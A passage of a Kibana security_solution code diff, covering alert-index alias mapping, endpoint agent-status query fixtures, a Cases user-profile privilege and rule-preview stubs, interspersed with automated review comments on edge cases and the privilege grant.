--- a/x-pack/plugins/security_solution/public/risk_score/containers/kpi/index.tsx +++ b/x-pack/plugins/security_solution/public/risk_score/containers/kpi/index.tsx @@ -30,7 +30,7 @@ import { isIndexNotFoundError } from '../../../common/utils/exceptions'; import type { ESTermQuery } from '../../../../common/typed_json'; import { useIsExperimentalFeatureEnabled } from '../../../common/hooks/use_experimental_features'; import type { SeverityCount } from '../../../common/components/severity/types'; -import { useSpaceId } from '../common'; +import { useSpaceId } from '../../../common/hooks/use_space_id'; type GetHostsRiskScoreProps = KpiRiskScoreRequestOptions & { data: DataPublicPluginStart; diff --git a/x-pack/plugins/security_solution/public/timelines/components/open_timeline/helpers.ts b/x-pack/plugins/security_solution/public/timelines/components/open_timeline/helpers.ts index 8c69ae2df30da..0d560b600ae34 100644 --- a/x-pack/plugins/security_solution/public/timelines/components/open_timeline/helpers.ts +++ b/x-pack/plugins/security_solution/public/timelines/components/open_timeline/helpers.ts @@ -5,7 +5,7 @@ * 2.0. */ -import { set } from '@elastic/safer-lodash-set/fp'; +import { set } from '@kbn/safer-lodash-set/fp'; import { getOr, isEmpty } from 'lodash/fp'; import type { Action } from 'typescript-fsa'; import uuid from 'uuid'; diff --git a/x-pack/plugins/security_solution/public/timelines/components/side_panel/event_details/helpers.tsx b/x-pack/plugins/security_solution/public/timelines/components/side_panel/event_details/helpers.tsx index 32af7f9920a34..b34338b4cbce9 100644 --- a/x-pack/plugins/security_solution/public/timelines/components/side_panel/event_details/helpers.tsx +++ b/x-pack/plugins/security_solution/public/timelines/components/side_panel/event_details/helpers.tsx 
@@ -9,6 +9,7 @@ import { some } from 'lodash/fp'; import { useMemo } from 'react'; import type { TimelineEventsDetailsItem } from '../../../../../common/search_strategy'; import { getFieldValue } from '../../../../detections/components/host_isolation/helpers'; +import { DEFAULT_ALERTS_INDEX, DEFAULT_PREVIEW_INDEX } from '../../../../../common/constants'; interface GetBasicDataFromDetailsData { alertId: string; @@ -51,3 +52,20 @@ export const useBasicDataFromDetailsData = ( [alertId, hostName, isAlert, ruleName, timestamp] ); }; + +/* +The referenced alert _index in the flyout uses the `.internal.` such as +`.internal.alerts-security.alerts-spaceId` in the alert page flyout and +.internal.preview.alerts-security.alerts-spaceId` in the rule creation preview flyout +but we always want to use their respective aliase indices rather than accessing their backing .internal. indices. +*/ +export const getAlertIndexAlias = ( + index: string, + spaceId: string = 'default' +): string | undefined => { + if (index.startsWith(`.internal${DEFAULT_ALERTS_INDEX}`)) { + return `${DEFAULT_ALERTS_INDEX}-${spaceId}`; + } else if (index.startsWith(`.internal${DEFAULT_PREVIEW_INDEX}`)) { + return `${DEFAULT_PREVIEW_INDEX}-${spaceId}`; + } +}; diff --git a/x-pack/plugins/security_solution/public/timelines/components/side_panel/event_details/index.test.tsx b/x-pack/plugins/security_solution/public/timelines/components/side_panel/event_details/index.test.tsx index 2e69985258247..c9b1d42b535ec 100644 --- a/x-pack/plugins/security_solution/public/timelines/components/side_panel/event_details/index.test.tsx +++ b/x-pack/plugins/security_solution/public/timelines/components/side_panel/event_details/index.test.tsx 
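Review bot: `getAlertIndexAlias` throws away whatever space suffix the `.internal.` backing index carried and substitutes the caller's `spaceId`, and when the caller passes `undefined` (plausible for `useSpaceId` before the spaces request has resolved) the default parameter silently selects the `default` space alias, so the flyout would query a different space's alerts alias than the one the document actually lives in. Returning early instead, `if (!spaceId) return undefined;` as the first statement, lets the caller's `?? indexName` fall back to the original index name, which is what happened before this change. The doc comment above the function is also missing the opening backtick before `.internal.preview.alerts-security.alerts-spaceId`, and `aliase indices` should read `alias indices`.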
@@ -11,8 +11,6 @@ import '../../../../common/mock/match_media'; import { TestProviders } from '../../../../common/mock'; import { TimelineId, TimelineTabs } from '../../../../../common/types/timeline'; import type { Ecs } from '../../../../../common/ecs'; -import { mockAlertDetailsData } from '../../../../common/components/event_details/__mocks__'; -import type { TimelineEventsDetailsItem } from '../../../../../common/search_strategy'; import { KibanaServices, useKibana, @@ -21,7 +19,9 @@ import { import { mockBrowserFields, mockRuntimeMappings } from '../../../../common/containers/source/mock'; import { coreMock } from '@kbn/core/public/mocks'; import { mockCasesContext } from '@kbn/cases-plugin/public/mocks/mock_cases_context'; +import { useTimelineEventsDetails } from '../../../containers/details'; import { allCasesPermissions } from '../../../../cases_test_utils'; +import { DEFAULT_ALERTS_INDEX, DEFAULT_PREVIEW_INDEX } from '../../../../../common/constants'; const ecsData: Ecs = { _id: '1', @@ -37,19 +37,16 @@ const ecsData: Ecs = { }, }; -const mockAlertDetailsDataWithIsObject = mockAlertDetailsData.map((detail) => { - return { - ...detail, - isObjectArray: false, - }; -}) as TimelineEventsDetailsItem[]; - jest.mock('../../../../../common/endpoint/service/host_isolation/utils', () => { return { isIsolationSupported: jest.fn().mockReturnValue(true), }; }); +jest.mock('../../../../common/hooks/use_space_id', () => ({ + useSpaceId: jest.fn().mockReturnValue('testSpace'), +})); + jest.mock( '../../../../detections/containers/detection_engine/alerts/use_host_isolation_status', () => { 
@@ -101,18 +98,23 @@ const mockSearchStrategy = jest.fn(); const defaultProps = { timelineId: TimelineId.test, - loadingEventDetails: false, - detailsEcsData: ecsData, isHostIsolationPanelOpen: false, handleOnEventClosed: jest.fn(), onAddIsolationStatusClick: jest.fn(), expandedEvent: { eventId: ecsData._id, indexName: '' }, - detailsData: mockAlertDetailsDataWithIsObject, tabType: TimelineTabs.query, browserFields: mockBrowserFields, runtimeMappings: mockRuntimeMappings, }; +jest.mock('../../../containers/details', () => { + const actual = jest.requireActual('../../../containers/details'); + return { + ...actual, + useTimelineEventsDetails: jest.fn().mockImplementation(() => []), + }; +}); + describe('event details footer component', () => { beforeEach(() => { const coreStartMock = coreMock.createStart(); 
@@ -169,4 +171,76 @@ describe('event details footer component', () => { const element = wrapper.queryByTestId('side-panel-flyout-footer'); expect(element).toBeNull(); }); + + describe('Alerts', () => { + const propsWithAlertIndex = { + ...defaultProps, + expandedEvent: { + eventId: ecsData._id, + indexName: `.internal${DEFAULT_ALERTS_INDEX}-testSpace`, + }, + }; + test('it uses the alias alerts index', () => { + render( + + + + ); + expect(useTimelineEventsDetails).toHaveBeenCalledWith({ + entityType: 'events', + indexName: `${DEFAULT_ALERTS_INDEX}-testSpace`, + eventId: propsWithAlertIndex.expandedEvent.eventId ?? '', + runtimeMappings: mockRuntimeMappings, + skip: false, + }); + }); + + test('it uses the alias alerts preview index', () => { + const alertPreviewProps = { + ...propsWithAlertIndex, + expandedEvent: { + ...propsWithAlertIndex.expandedEvent, + indexName: `.internal${DEFAULT_PREVIEW_INDEX}-testSpace`, + }, + }; + render( + + + + ); + + expect(useTimelineEventsDetails).toHaveBeenCalledWith({ + entityType: 'events', + indexName: `${DEFAULT_PREVIEW_INDEX}-testSpace`, + eventId: propsWithAlertIndex.expandedEvent.eventId, + runtimeMappings: mockRuntimeMappings, + skip: false, + }); + }); + + test(`it does NOT use the alerts alias when regular events happen to include a trailing '${DEFAULT_ALERTS_INDEX}' in the index name`, () => { + const indexName = `.ds-logs-endpoint.alerts-default-2022.08.09-000001${DEFAULT_ALERTS_INDEX}`; // a regular event, that happens to include a trailing `.alerts-security.alerts` + const propsWithEventIndex = { + ...defaultProps, + expandedEvent: { + eventId: ecsData._id, + indexName, + }, + }; + + render( + + + + ); + + expect(useTimelineEventsDetails).toHaveBeenCalledWith({ + entityType: 'events', + indexName, // <-- use the original index name, not the alerts alias + eventId: propsWithEventIndex.expandedEvent.eventId, + runtimeMappings: mockRuntimeMappings, + skip: false, + }); + }); + }); }); 
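Review bot: The new `Alerts` tests only exercise a resolved space id, because `useSpaceId` is mocked to always return `'testSpace'`; the path where `getAlertIndexAlias` receives `undefined` and falls back to the `default` space alias has no coverage, and neither does an `.internal.` index whose suffix names a space other than the current one. A fourth case that re-mocks `useSpaceId` to return `undefined` and asserts the `indexName` handed to `useTimelineEventsDetails` would pin whichever behaviour is intended there. Since `useTimelineEventsDetails` is mocked to return `[]`, every destructured value in the component is `undefined`; that is fine for these assertions but deserves a one-line comment on the mock.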
diff --git a/x-pack/plugins/security_solution/public/timelines/components/side_panel/event_details/index.tsx b/x-pack/plugins/security_solution/public/timelines/components/side_panel/event_details/index.tsx index 8859b6f20ab33..2c0247a4d61da 100644 --- a/x-pack/plugins/security_solution/public/timelines/components/side_panel/event_details/index.tsx +++ b/x-pack/plugins/security_solution/public/timelines/components/side_panel/event_details/index.tsx @@ -20,7 +20,8 @@ import type { HostRisk } from '../../../../risk_score/containers'; import { useHostRiskScore } from '../../../../risk_score/containers'; import { useHostIsolationTools } from './use_host_isolation_tools'; import { FlyoutBody, FlyoutHeader, FlyoutFooter } from './flyout'; -import { useBasicDataFromDetailsData } from './helpers'; +import { useBasicDataFromDetailsData, getAlertIndexAlias } from './helpers'; +import { useSpaceId } from '../../../../common/hooks/use_space_id'; interface EventDetailsPanelProps { browserFields: BrowserFields; @@ -51,10 +52,13 @@ const EventDetailsPanelComponent: React.FC = ({ timelineId, isReadOnly, }) => { + const currentSpaceId = useSpaceId(); + const { indexName } = expandedEvent; + const eventIndex = getAlertIndexAlias(indexName, currentSpaceId) ?? indexName; const [loading, detailsData, rawEventData, ecsData, refetchFlyoutData] = useTimelineEventsDetails( { entityType, - indexName: expandedEvent.indexName ?? '', + indexName: eventIndex ?? '', eventId: expandedEvent.eventId ?? '', runtimeMappings, skip: !expandedEvent.eventId, diff --git a/x-pack/plugins/security_solution/server/endpoint/routes/metadata/metadata.test.ts b/x-pack/plugins/security_solution/server/endpoint/routes/metadata/metadata.test.ts index 6eb04c9833e27..906b1e3168a70 100644 --- a/x-pack/plugins/security_solution/server/endpoint/routes/metadata/metadata.test.ts +++ b/x-pack/plugins/security_solution/server/endpoint/routes/metadata/metadata.test.ts 
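Review bot: `getAlertIndexAlias(indexName, currentSpaceId)` is now called with `indexName` taken straight from `expandedEvent`, but the removed line guarded that same value with `?? ''`, which suggests it can be `undefined`; if it is, the call throws a `TypeError` on `index.startsWith` before the hook runs, and the later `eventIndex ?? ''` never gets the chance to catch it. Guard before the call: `const eventIndex = indexName ? (getAlertIndexAlias(indexName, currentSpaceId) ?? indexName) : '';`. If `indexName` is typed as a non-optional `string` the old `?? ''` was dead code and this is moot, but that type is not visible in the hunk.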
@@ -248,30 +248,6 @@ describe('test endpoint routes', () => { must: [ { bool: { - filter: [ - { - terms: { - 'united.agent.policy_id': [], - }, - }, - { - exists: { - field: 'united.endpoint.agent.id', - }, - }, - { - exists: { - field: 'united.agent.agent.id', - }, - }, - { - term: { - 'united.agent.active': { - value: true, - }, - }, - }, - ], must_not: { terms: { 'agent.id': [ @@ -280,6 +256,12 @@ describe('test endpoint routes', () => { ], }, }, + filter: [ + { terms: { 'united.agent.policy_id': [] } }, + { exists: { field: 'united.endpoint.agent.id' } }, + { exists: { field: 'united.agent.agent.id' } }, + { term: { 'united.agent.active': { value: true } } }, + ], }, }, { @@ -290,13 +272,7 @@ describe('test endpoint routes', () => { filter: [ { bool: { - should: [ - { - exists: { - field: 'united.agent.upgrade_started_at', - }, - }, - ], + should: [{ exists: { field: 'united.agent.upgrade_started_at' } }], minimum_should_match: 1, }, }, @@ -304,13 +280,7 @@ describe('test endpoint routes', () => { bool: { must_not: { bool: { - should: [ - { - exists: { - field: 'united.agent.upgraded_at', - }, - }, - ], + should: [{ exists: { field: 'united.agent.upgraded_at' } }], minimum_should_match: 1, }, }, @@ -323,13 +293,7 @@ describe('test endpoint routes', () => { bool: { must_not: { bool: { - should: [ - { - exists: { - field: 'united.agent.last_checkin', - }, - }, - ], + should: [{ exists: { field: 'united.agent.last_checkin' } }], minimum_should_match: 1, }, }, @@ -337,16 +301,20 @@ describe('test endpoint routes', () => { }, { bool: { - should: [ - { - exists: { - field: 'united.agent.unenrollment_started_at', - }, - }, - ], + should: [{ exists: { field: 'united.agent.unenrollment_started_at' } }], minimum_should_match: 1, }, }, + { + bool: { + must_not: { + bool: { + should: [{ exists: { field: 'united.agent.policy_revision_idx' } }], + minimum_should_match: 1, + }, + }, + }, + }, ], minimum_should_match: 1, }, 
@@ -355,13 +323,7 @@ describe('test endpoint routes', () => { bool: { must_not: { bool: { - should: [ - { - match: { - 'host.ip': '10.140.73.246', - }, - }, - ], + should: [{ match: { 'host.ip': '10.140.73.246' } }], minimum_should_match: 1, }, }, diff --git a/x-pack/plugins/security_solution/server/endpoint/routes/metadata/query_builders.fixtures.ts b/x-pack/plugins/security_solution/server/endpoint/routes/metadata/query_builders.fixtures.ts index 31b383f2a033e..30189459ff167 100644 --- a/x-pack/plugins/security_solution/server/endpoint/routes/metadata/query_builders.fixtures.ts +++ b/x-pack/plugins/security_solution/server/endpoint/routes/metadata/query_builders.fixtures.ts @@ -18,28 +18,10 @@ export const expectedCompleteUnitedIndexQuery = { }, }, filter: [ - { - terms: { - 'united.agent.policy_id': ['test-endpoint-policy-id'], - }, - }, - { - exists: { - field: 'united.endpoint.agent.id', - }, - }, - { - exists: { - field: 'united.agent.agent.id', - }, - }, - { - term: { - 'united.agent.active': { - value: true, - }, - }, - }, + { terms: { 'united.agent.policy_id': ['test-endpoint-policy-id'] } }, + { exists: { field: 'united.endpoint.agent.id' } }, + { exists: { field: 'united.agent.agent.id' } }, + { term: { 'united.agent.active': { value: true } } }, ], }, }, @@ -53,15 +35,7 @@ export const expectedCompleteUnitedIndexQuery = { filter: [ { bool: { - should: [ - { - range: { - 'united.agent.last_checkin': { - lt: 'now-300s', - }, - }, - }, - ], + should: [{ range: { 'united.agent.last_checkin': { lt: 'now-300s' } } }], minimum_should_match: 1, }, }, @@ -168,6 +142,22 @@ export const expectedCompleteUnitedIndexQuery = { minimum_should_match: 1, }, }, + { + bool: { + must_not: { + bool: { + should: [ + { + exists: { + field: 'united.agent.policy_revision_idx', + }, + }, + ], + minimum_should_match: 1, + }, + }, + }, + }, ], minimum_should_match: 1, }, 
@@ -191,9 +181,7 @@ export const expectedCompleteUnitedIndexQuery = { bool: { should: [ { - exists: { - field: 'united.agent.upgrade_started_at', - }, + exists: { field: 'united.agent.upgrade_started_at' }, }, ], minimum_should_match: 1, @@ -204,11 +192,7 @@ export const expectedCompleteUnitedIndexQuery = { must_not: { bool: { should: [ - { - exists: { - field: 'united.agent.upgraded_at', - }, - }, + { exists: { field: 'united.agent.upgraded_at' } }, ], minimum_should_match: 1, }, @@ -223,11 +207,7 @@ export const expectedCompleteUnitedIndexQuery = { must_not: { bool: { should: [ - { - exists: { - field: 'united.agent.last_checkin', - }, - }, + { exists: { field: 'united.agent.last_checkin' } }, ], minimum_should_match: 1, }, @@ -237,15 +217,23 @@ export const expectedCompleteUnitedIndexQuery = { { bool: { should: [ - { - exists: { - field: 'united.agent.unenrollment_started_at', - }, - }, + { exists: { field: 'united.agent.unenrollment_started_at' } }, ], minimum_should_match: 1, }, }, + { + bool: { + must_not: { + bool: { + should: [ + { exists: { field: 'united.agent.policy_revision_idx' } }, + ], + minimum_should_match: 1, + }, + }, + }, + }, ], minimum_should_match: 1, }, @@ -268,11 +256,7 @@ export const expectedCompleteUnitedIndexQuery = { { bool: { should: [ - { - match: { - 'united.agent.last_checkin_status': 'error', - }, - }, + { match: { 'united.agent.last_checkin_status': 'error' } }, ], minimum_should_match: 1, }, @@ -280,11 +264,7 @@ export const expectedCompleteUnitedIndexQuery = { { bool: { should: [ - { - match: { - 'united.agent.last_checkin_status': 'degraded', - }, - }, + { match: { 'united.agent.last_checkin_status': 'degraded' } }, ], minimum_should_match: 1, }, @@ -305,9 +285,7 @@ export const expectedCompleteUnitedIndexQuery = { bool: { should: [ { - exists: { - field: 'united.agent.upgrade_started_at', - }, + exists: { field: 'united.agent.upgrade_started_at' }, }, ], minimum_should_match: 1, 
@@ -318,11 +296,7 @@ export const expectedCompleteUnitedIndexQuery = { must_not: { bool: { should: [ - { - exists: { - field: 'united.agent.upgraded_at', - }, - }, + { exists: { field: 'united.agent.upgraded_at' } }, ], minimum_should_match: 1, }, @@ -337,11 +311,7 @@ export const expectedCompleteUnitedIndexQuery = { must_not: { bool: { should: [ - { - exists: { - field: 'united.agent.last_checkin', - }, - }, + { exists: { field: 'united.agent.last_checkin' } }, ], minimum_should_match: 1, }, @@ -351,15 +321,23 @@ export const expectedCompleteUnitedIndexQuery = { { bool: { should: [ - { - exists: { - field: 'united.agent.unenrollment_started_at', - }, - }, + { exists: { field: 'united.agent.unenrollment_started_at' } }, ], minimum_should_match: 1, }, }, + { + bool: { + must_not: { + bool: { + should: [ + { exists: { field: 'united.agent.policy_revision_idx' } }, + ], + minimum_should_match: 1, + }, + }, + }, + }, ], minimum_should_match: 1, }, @@ -381,13 +359,7 @@ export const expectedCompleteUnitedIndexQuery = { filter: [ { bool: { - should: [ - { - exists: { - field: 'united.agent.upgrade_started_at', - }, - }, - ], + should: [{ exists: { field: 'united.agent.upgrade_started_at' } }], minimum_should_match: 1, }, }, @@ -395,13 +367,7 @@ export const expectedCompleteUnitedIndexQuery = { bool: { must_not: { bool: { - should: [ - { - exists: { - field: 'united.agent.upgraded_at', - }, - }, - ], + should: [{ exists: { field: 'united.agent.upgraded_at' } }], minimum_should_match: 1, }, }, @@ -414,13 +380,7 @@ export const expectedCompleteUnitedIndexQuery = { bool: { must_not: { bool: { - should: [ - { - exists: { - field: 'united.agent.last_checkin', - }, - }, - ], + should: [{ exists: { field: 'united.agent.last_checkin' } }], minimum_should_match: 1, }, }, 
@@ -428,16 +388,20 @@ export const expectedCompleteUnitedIndexQuery = { }, { bool: { - should: [ - { - exists: { - field: 'united.agent.unenrollment_started_at', - }, - }, - ], + should: [{ exists: { field: 'united.agent.unenrollment_started_at' } }], minimum_should_match: 1, }, }, + { + bool: { + must_not: { + bool: { + should: [{ exists: { field: 'united.agent.policy_revision_idx' } }], + minimum_should_match: 1, + }, + }, + }, + }, ], minimum_should_match: 1, }, @@ -449,13 +413,7 @@ export const expectedCompleteUnitedIndexQuery = { }, { bool: { - should: [ - { - exists: { - field: 'united.endpoint.host.os.name', - }, - }, - ], + should: [{ exists: { field: 'united.endpoint.host.os.name' } }], minimum_should_match: 1, }, }, diff --git a/x-pack/plugins/security_solution/server/endpoint/routes/metadata/support/agent_status.test.ts b/x-pack/plugins/security_solution/server/endpoint/routes/metadata/support/agent_status.test.ts index f3c5c6b542de5..7f89444b21fa5 100644 --- a/x-pack/plugins/security_solution/server/endpoint/routes/metadata/support/agent_status.test.ts +++ b/x-pack/plugins/security_solution/server/endpoint/routes/metadata/support/agent_status.test.ts 
@@ -93,7 +93,7 @@ describe('test filtering endpoint hosts by agent status', () => { const status = ['healthy']; const kuery = buildStatusesKuery(status); const expected = - '(not (united.agent.last_checkin < now-300s AND not ((united.agent.last_checkin_status:error or united.agent.last_checkin_status:degraded) AND not (((united.agent.upgrade_started_at:*) and not (united.agent.upgraded_at:*)) or (not (united.agent.last_checkin:*)) or (united.agent.unenrollment_started_at:*))) AND not ( ((united.agent.upgrade_started_at:*) and not (united.agent.upgraded_at:*)) or (not (united.agent.last_checkin:*)) or (united.agent.unenrollment_started_at:*) )) AND not ((united.agent.last_checkin_status:error or united.agent.last_checkin_status:degraded) AND not (((united.agent.upgrade_started_at:*) and not (united.agent.upgraded_at:*)) or (not (united.agent.last_checkin:*)) or (united.agent.unenrollment_started_at:*))) AND not (((united.agent.upgrade_started_at:*) and not (united.agent.upgraded_at:*)) or (not (united.agent.last_checkin:*)) or (united.agent.unenrollment_started_at:*)))'; + '(not (united.agent.last_checkin < now-300s AND not ((united.agent.last_checkin_status:error or united.agent.last_checkin_status:degraded) AND not (((united.agent.upgrade_started_at:*) and not (united.agent.upgraded_at:*)) or (not (united.agent.last_checkin:*)) or (united.agent.unenrollment_started_at:*) or (not united.agent.policy_revision_idx:*))) AND not ( ((united.agent.upgrade_started_at:*) and not (united.agent.upgraded_at:*)) or (not (united.agent.last_checkin:*)) or (united.agent.unenrollment_started_at:*) or (not united.agent.policy_revision_idx:*) )) AND not ((united.agent.last_checkin_status:error or united.agent.last_checkin_status:degraded) AND not (((united.agent.upgrade_started_at:*) and not (united.agent.upgraded_at:*)) or (not (united.agent.last_checkin:*)) or (united.agent.unenrollment_started_at:*) or (not united.agent.policy_revision_idx:*))) AND not 
(((united.agent.upgrade_started_at:*) and not (united.agent.upgraded_at:*)) or (not (united.agent.last_checkin:*)) or (united.agent.unenrollment_started_at:*) or (not united.agent.policy_revision_idx:*)))'; expect(kuery).toEqual(expected); }); @@ -101,7 +101,7 @@ describe('test filtering endpoint hosts by agent status', () => { const status = ['offline']; const kuery = buildStatusesKuery(status); const expected = - '(united.agent.last_checkin < now-300s AND not ((united.agent.last_checkin_status:error or united.agent.last_checkin_status:degraded) AND not (((united.agent.upgrade_started_at:*) and not (united.agent.upgraded_at:*)) or (not (united.agent.last_checkin:*)) or (united.agent.unenrollment_started_at:*))) AND not ( ((united.agent.upgrade_started_at:*) and not (united.agent.upgraded_at:*)) or (not (united.agent.last_checkin:*)) or (united.agent.unenrollment_started_at:*) ))'; + '(united.agent.last_checkin < now-300s AND not ((united.agent.last_checkin_status:error or united.agent.last_checkin_status:degraded) AND not (((united.agent.upgrade_started_at:*) and not (united.agent.upgraded_at:*)) or (not (united.agent.last_checkin:*)) or (united.agent.unenrollment_started_at:*) or (not united.agent.policy_revision_idx:*))) AND not ( ((united.agent.upgrade_started_at:*) and not (united.agent.upgraded_at:*)) or (not (united.agent.last_checkin:*)) or (united.agent.unenrollment_started_at:*) or (not united.agent.policy_revision_idx:*) ))'; expect(kuery).toEqual(expected); }); 
@@ -109,7 +109,7 @@ describe('test filtering endpoint hosts by agent status', () => { const status = ['unhealthy']; const kuery = buildStatusesKuery(status); const expected = - '((united.agent.last_checkin_status:error or united.agent.last_checkin_status:degraded) AND not (((united.agent.upgrade_started_at:*) and not (united.agent.upgraded_at:*)) or (not (united.agent.last_checkin:*)) or (united.agent.unenrollment_started_at:*)))'; + '((united.agent.last_checkin_status:error or united.agent.last_checkin_status:degraded) AND not (((united.agent.upgrade_started_at:*) and not (united.agent.upgraded_at:*)) or (not (united.agent.last_checkin:*)) or (united.agent.unenrollment_started_at:*) or (not united.agent.policy_revision_idx:*)))'; expect(kuery).toEqual(expected); }); @@ -117,7 +117,7 @@ describe('test filtering endpoint hosts by agent status', () => { const status = ['updating']; const kuery = buildStatusesKuery(status); const expected = - '(((united.agent.upgrade_started_at:*) and not (united.agent.upgraded_at:*)) or (not (united.agent.last_checkin:*)) or (united.agent.unenrollment_started_at:*))'; + '(((united.agent.upgrade_started_at:*) and not (united.agent.upgraded_at:*)) or (not (united.agent.last_checkin:*)) or (united.agent.unenrollment_started_at:*) or (not united.agent.policy_revision_idx:*))'; expect(kuery).toEqual(expected); }); 
@@ -132,7 +132,7 @@ describe('test filtering endpoint hosts by agent status', () => { const statuses = ['offline', 'unhealthy']; const kuery = buildStatusesKuery(statuses); const expected = - '(united.agent.last_checkin < now-300s AND not ((united.agent.last_checkin_status:error or united.agent.last_checkin_status:degraded) AND not (((united.agent.upgrade_started_at:*) and not (united.agent.upgraded_at:*)) or (not (united.agent.last_checkin:*)) or (united.agent.unenrollment_started_at:*))) AND not ( ((united.agent.upgrade_started_at:*) and not (united.agent.upgraded_at:*)) or (not (united.agent.last_checkin:*)) or (united.agent.unenrollment_started_at:*) ) OR (united.agent.last_checkin_status:error or united.agent.last_checkin_status:degraded) AND not (((united.agent.upgrade_started_at:*) and not (united.agent.upgraded_at:*)) or (not (united.agent.last_checkin:*)) or (united.agent.unenrollment_started_at:*)))'; + '(united.agent.last_checkin < now-300s AND not ((united.agent.last_checkin_status:error or united.agent.last_checkin_status:degraded) AND not (((united.agent.upgrade_started_at:*) and not (united.agent.upgraded_at:*)) or (not (united.agent.last_checkin:*)) or (united.agent.unenrollment_started_at:*) or (not united.agent.policy_revision_idx:*))) AND not ( ((united.agent.upgrade_started_at:*) and not (united.agent.upgraded_at:*)) or (not (united.agent.last_checkin:*)) or (united.agent.unenrollment_started_at:*) or (not united.agent.policy_revision_idx:*) ) OR (united.agent.last_checkin_status:error or united.agent.last_checkin_status:degraded) AND not (((united.agent.upgrade_started_at:*) and not (united.agent.upgraded_at:*)) or (not (united.agent.last_checkin:*)) or (united.agent.unenrollment_started_at:*) or (not united.agent.policy_revision_idx:*)))'; expect(kuery).toEqual(expected); }); }); 
diff --git a/x-pack/plugins/security_solution/server/endpoint/routes/resolver/tree/queries/stats.ts b/x-pack/plugins/security_solution/server/endpoint/routes/resolver/tree/queries/stats.ts
index 0b2a7e9c986a0..eb06b7b6f5f5e 100644
--- a/x-pack/plugins/security_solution/server/endpoint/routes/resolver/tree/queries/stats.ts
+++ b/x-pack/plugins/security_solution/server/endpoint/routes/resolver/tree/queries/stats.ts
@@ -211,7 +211,7 @@ export class StatsQuery {
 [id]: {
 total: alertCount + otherEvents.total,
 byCategory: {
- alerts: alertCount,
+ alert: alertCount,
 ...otherEvents.byCategory,
 },
 },
@@ -222,7 +222,7 @@ export class StatsQuery {
 [id]: {
 total: alertCount,
 byCategory: {
- alerts: alertCount,
+ alert: alertCount,
 },
 },
 };
diff --git a/x-pack/plugins/security_solution/server/features.ts b/x-pack/plugins/security_solution/server/features.ts
index fa9d94a260ce6..c962e9fbf2d87 100644
--- a/x-pack/plugins/security_solution/server/features.ts
+++ b/x-pack/plugins/security_solution/server/features.ts
@@ -29,7 +29,7 @@ export const getCasesKibanaFeature = (): KibanaFeatureConfig => {
 cases: [APP_ID],
 privileges: {
 all: {
- api: ['casesSuggestUserProfiles'],
+ api: ['casesSuggestUserProfiles', 'bulkGetUserProfiles'],
 app: [CASES_FEATURE_ID, 'kibana'],
 catalogue: [APP_ID],
 cases: {
@@ -45,6 +45,7 @@ export const getCasesKibanaFeature = (): KibanaFeatureConfig => {
 ui: casesCapabilities.all,
 },
 read: {
+ api: ['bulkGetUserProfiles'],
 app: [CASES_FEATURE_ID, 'kibana'],
 catalogue: [APP_ID],
 cases: {
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/routes/rules/preview_rules_route.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/routes/rules/preview_rules_route.ts
index e733f36d1421a..9bc72854e0e22 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/routes/rules/preview_rules_route.ts
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/routes/rules/preview_rules_route.ts
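Review bot: Adding `bulkGetUserProfiles` to the Cases `read` privilege lets a read-only Cases user call whichever route is tagged with that API id, which presumably returns user-profile data (display names, emails) for arbitrary uids; that route is not in this diff, so please confirm it limits results to profiles referenced by cases the caller can already see, or at least requires the caller to supply uids rather than permitting enumeration. A short comment beside the new entry recording why read access needs it, e.g. `// read-only users still resolve assignee/author profiles when rendering a case`, would stop a later reviewer from removing it as an over-grant. The same tag is added to `all` in the earlier hunk of this file, so only the `read` grant widens the reachable surface.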
@@ -185,6 +185,7 @@ export const previewRulesRoute = async ( | 'getContext' | 'hasContext' >; + hasReachedAlertLimit: () => boolean; done: () => { getRecoveredAlerts: () => [] }; } ) => { @@ -284,7 +285,11 @@ export const previewRulesRoute = async ( queryAlertType.name, previewRuleParams, () => true, - { create: alertInstanceFactoryStub, done: () => ({ getRecoveredAlerts: () => [] }) } + { + create: alertInstanceFactoryStub, + hasReachedAlertLimit: () => false, + done: () => ({ getRecoveredAlerts: () => [] }), + } ); break; case 'saved_query': @@ -297,7 +302,11 @@ export const previewRulesRoute = async ( savedQueryAlertType.name, previewRuleParams, () => true, - { create: alertInstanceFactoryStub, done: () => ({ getRecoveredAlerts: () => [] }) } + { + create: alertInstanceFactoryStub, + hasReachedAlertLimit: () => false, + done: () => ({ getRecoveredAlerts: () => [] }), + } ); break; case 'threshold': @@ -310,7 +319,11 @@ export const previewRulesRoute = async ( thresholdAlertType.name, previewRuleParams, () => true, - { create: alertInstanceFactoryStub, done: () => ({ getRecoveredAlerts: () => [] }) } + { + create: alertInstanceFactoryStub, + hasReachedAlertLimit: () => false, + done: () => ({ getRecoveredAlerts: () => [] }), + } ); break; case 'threat_match': @@ -323,7 +336,11 @@ export const previewRulesRoute = async ( threatMatchAlertType.name, previewRuleParams, () => true, - { create: alertInstanceFactoryStub, done: () => ({ getRecoveredAlerts: () => [] }) } + { + create: alertInstanceFactoryStub, + hasReachedAlertLimit: () => false, + done: () => ({ getRecoveredAlerts: () => [] }), + } ); break; case 'eql': 
@@ -334,7 +351,11 @@ export const previewRulesRoute = async (
 eqlAlertType.name,
 previewRuleParams,
 () => true,
- { create: alertInstanceFactoryStub, done: () => ({ getRecoveredAlerts: () => [] }) }
+ {
+ create: alertInstanceFactoryStub,
+ hasReachedAlertLimit: () => false,
+ done: () => ({ getRecoveredAlerts: () => [] }),
+ }
 );
 break;
 case 'machine_learning':
@@ -345,7 +366,11 @@ export const previewRulesRoute = async (
 mlAlertType.name,
 previewRuleParams,
 () => true,
- { create: alertInstanceFactoryStub, done: () => ({ getRecoveredAlerts: () => [] }) }
+ {
+ create: alertInstanceFactoryStub,
+ hasReachedAlertLimit: () => false,
+ done: () => ({ getRecoveredAlerts: () => [] }),
+ }
 );
 break;
 case 'new_terms':
@@ -356,7 +381,11 @@ export const previewRulesRoute = async (
 newTermsAlertType.name,
 previewRuleParams,
 () => true,
- { create: alertInstanceFactoryStub, done: () => ({ getRecoveredAlerts: () => [] }) }
+ {
+ create: alertInstanceFactoryStub,
+ hasReachedAlertLimit: () => false,
+ done: () => ({ getRecoveredAlerts: () => [] }),
+ }
 );
 break;
 default:
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/__mocks__/rule_type.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/__mocks__/rule_type.ts
index f2f023e28da7d..992db3ec1e89a 100644
